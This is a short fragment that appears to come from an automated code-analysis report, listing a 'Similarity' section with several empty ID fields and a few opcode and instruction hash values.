                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 59dcc6ed4805fde6533da8ce66f94d932818ab1b10fe05acd6c752ce2fb4dbaa
                                                                                                                                              • Instruction ID: 77a7e97be635ba6f8ce61a53dfa6be9dc22d3cc32e4213d550d541aba592b2a6
                                                                                                                                              • Opcode Fuzzy Hash: 59dcc6ed4805fde6533da8ce66f94d932818ab1b10fe05acd6c752ce2fb4dbaa
                                                                                                                                              • Instruction Fuzzy Hash: 19F0627140A3449AE7208A16CC84B66FFACEF51725F18C45AED484B296C2799C44CB71